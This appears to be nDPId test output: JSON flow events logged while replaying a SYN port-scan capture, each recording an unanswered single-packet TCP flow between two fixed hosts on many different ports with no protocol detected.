-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5925,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5925,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1840,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3889,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1840,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3889,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5950,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5950,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5952,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5952,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
